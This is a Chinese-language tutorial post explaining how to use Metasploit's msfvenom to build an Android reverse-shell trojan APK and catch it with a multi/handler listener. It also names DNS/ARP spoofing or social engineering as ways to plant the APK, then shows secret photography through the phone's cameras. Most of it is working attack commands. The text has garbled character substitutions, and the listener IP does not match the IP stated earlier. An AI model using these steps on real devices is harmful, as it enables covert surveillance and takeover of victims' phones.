MSF入侵安卓手机

MSF是Metasploit的简称，Metasploit是一款开源的安全漏洞检测工具，很是强大，分别有Windows版和Linux版，工具里集成了许多微软公布的漏洞(0day)。

我这里作测试的系统是Backbox linux ，这是一款网络渗透，信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。固然还有其它的 好比Kali linux 、Back Track这些等等。

 

环境：Backbox linux+MSF

目标：一台安卓手机

 

既然是入侵安卓手机，确定要先配置一个安卓木马，那咱们看看本机的IP 

本机IP：192.168.1.6

在到终端输入命令：msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

之前的MSF老版本是用msfpayload生成木马 如今在新版本中都用msfvenom代替了，因此有些朋友在终端输入msfpayload的时候 会提示

msfpayload没法找到命令 因此使用msfvenom便可，这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 而后生成木马的路径

这样咱们就在/root/路径下生成了一个APK的安卓木马文件，至于木马的免杀暂且不谈。如今咱们在来启动MSF工具

输入命令：msfconsole

而后输入：

1. use exploit/multi/handler 加载模块

2. set payload android/meterpreter/reverse_tcp  选择Payload

3.show options 查看参数设置

咱们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 如今咱们来更改设置

1.set LHOST 192.168.1.6 这里的地址设置成咱们刚才生成木马的IP地址

2.set LPORT 5555 这里的端口设置成刚才咱们生成木马所监听的端口

3.exploit 开始执行漏洞 开始监听...

OK，一切准备工做准备就绪。。。如今要作的就是把木马文件搞到人家的手机上，思路有不少 能够DNS arp劫持欺骗 只要对方用手机下载文件 就会下载咱们的木马文件

还有社工什么等等的，这里我就简单的把木马文件弄我本身的手机上作测试

 

安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是咱们刚才生成的木马 当咱们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了

咱们能够在咱们的MSF里看见有一个会话链接了

这样对方的手机就就被咱们控制了，查看手机系统信息，输入命令 sysinfo

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有先后两个摄像头

 webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

能够看见咱们分别对先后摄像头都拍了照 保存到了桌面上

还能够输入命令 webcam_stream 开启摄像头 

其它的功能还有更多 。暂时就先到这吧。。。